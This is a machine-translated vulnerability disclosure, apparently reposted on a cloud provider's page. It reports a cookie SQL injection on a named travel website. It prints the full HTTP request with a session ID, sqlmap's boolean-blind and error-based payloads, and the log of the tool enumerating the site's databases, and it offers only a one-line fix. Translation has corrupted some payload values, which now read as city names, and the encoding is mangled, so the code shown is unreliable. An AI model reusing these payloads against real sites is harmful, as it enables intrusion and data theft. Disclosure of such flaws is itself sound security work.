Touniu tourism network cookie Injection Vulnerability

Source: Internet
Author: User
Tags web server operating system

Visit the home page to view the submitted message and find that the link parameters are submitted with the cookie. We have detected the cookie injection vulnerability in the fuzz parameter. This problem is serious and we hope to pay attention to it.
Detailed description:
GET/zhoubian/leyuan/HTTP/1.1
Host: sy.tuniu.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-US, en; q = 0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://sy.tuniu.com/tours/311094
Cookie: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = region % 3D; visit_history = 311094; PHPSESSID = aq8r0pudtjl3t61vkss0i563o3
DNT: 1
Cache-Control: max-age = 0

Cookie injection vulnerability found in visit_history = 311094

 

Sqlmap identified the following injection points with a total of 210 HTTP (s) requests:
---
Place: Cookie
Parameter: visit_history
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND 4608 = 4608 AND (9847 = 9847; PHPSESSID = Beijing

Type: error-based
Title: MySQL >=5.0 AND error-based-WHERE or HAVING clause
Payload: tuniuuser_citycode = MTkwMg % 3D % 3D; tuniu_channel = Hangzhou % 3D; visit_history = 311094) AND (SELECT 3540 FROM (select count (*), CONCAT (0x3a79756b3a, (SELECT (case when (3540 = 3540) THEN 1 ELSE 0 END), 0x3a6878653a, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND (5085 = 5085; PHPSESSID = aq8r0pudtjl3t61vkss0i563o3
---

[11:03:27] [INFO] the back-end DBMS is MySQL
Web server operating system: Linux CentOS
Web application technology: PHP 5.3.3, Apache 2.2.15
Back-end DBMS: MySQL 5.0
[11:03:27] [INFO] fetching database names
[11:03:27] [WARNING] the SQL query provided does not return any output
[11:03:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '-- no-cast' and/or switch' -- hex'
[11:03:27] [INFO] fetching number of databases
[11:03:27] [INFO] retrieved: 3
[11:03:31] [INFO] retrieving the length of query output
[11:03:31] [INFO] retrieved: 18
[11:03:50] [INFO] retrieved: information_schema
[11:03:50] [INFO] retrieving the length of query output
[11:03:50] [INFO] retrieved: 4
[11:03:59] [INFO] retrieved: test
[11:03:59] [INFO] retrieving the length of query output
[11:03:59] [INFO] retrieved: 5
[11:04:09] [INFO] retrieved: tuniu
Available databases [3]:
[*] Information_schema
[*] Test
[*] Tuniu

[11:04:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error)-202 times
[11:04:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/sy.tuniu.com'
-------------------------------------------------------------
Use sqlmap to obtain database information
Available databases [3]:
[*] Information_schema
[*] Test
[*] Tuniu

I did not continue to do it. There are many problems. Please try again on the dark clouds if you have time ~~
Solution:
Parameter Filtering

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.